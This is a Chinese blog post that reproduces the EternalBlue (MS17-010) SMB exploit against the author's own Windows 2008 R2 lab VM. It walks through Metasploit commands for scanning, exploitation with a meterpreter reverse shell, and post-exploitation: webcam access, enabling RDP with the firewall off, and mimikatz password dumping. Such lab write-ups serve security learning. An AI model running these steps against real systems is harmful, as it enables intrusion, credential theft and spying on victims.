PJzhang:ms17-010永恆之藍漏洞在windows 2008R2中的復現

貓寧!!!

 

參考:

https://www.anquanke.com/post/id/86245

https://xz.aliyun.com/t/2536

https://www.cnblogs.com/backlion/p/9484949.html

https://www.jianshu.com/p/91588e284fe8

 

“永恆之藍”利用Windows系統的SMB漏洞可以獲取系統最高權限,危害極大。

 

微軟的漏洞2個漏洞公告

https://support.microsoft.com/zh-cn/help/4012598/title

https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010?redirectedfrom=MSDN

 

windows 2008R2鏡像從itellme站點獲取,種類齊全,比較乾淨。

https://msdn.itellyou.cn/

 

記得進行新建,建立系統保留分區哦,用於存放系統引導文件,類似於centos7的/boot分區,可以避免系統無法正常啓動。

 

虛擬機中的Windows 2008 R2一定要設置爲網卡橋接模式

 

ip是192.168.100.27,先用nmap掃描一下有沒有永恆之藍漏洞存在,掃描腳本在/usr/share/nmap/scripts/

nmap --script smb-vuln-ms17-010.nse 192.168.100.27,表明開啓了445端口,存在漏洞。

msfconsole,啓動MSF

search ms17_010

use auxiliary/scanner/smb/smb_ms17_010,使用POC進行掃描

set RHOST 192.168.100.27

run

證實存在漏洞

use exploit/windows/smb/ms17_010_eternalblue

set RHOST 192.168.100.27

run

竟然把服務器給打重啓了,沒有連接上去

show payloads,看一下更多種類的payload,46個

show targets,顯示適用的目標

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp,這個payload非常有助於後期的植入後門進行權限維持。

set RHOST 192.168.100.27

run

成功進入服務器系統

screenshot,截屏

webcam_scream,可以開啓攝像頭

run post/windows/manage/enable_rdp,開啓遠程桌面並關閉防火牆

shell,直接進入系統

load mimikatz,加載密碼讀取工具

wdigest,成功獲取我的密碼

rdesktop 192.168.100.27 -u Administrator -p 111aaabbb!!!

遠程連接服務器就好了

 

arp查看內網情形

獲得當前木馬進程,getid

ps查看

獲取用戶的身份和權限

判斷服務器是不是被人在使用

run和bgrun,有大量的幫助文件

sysinfo,顯示計算機信息

             

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章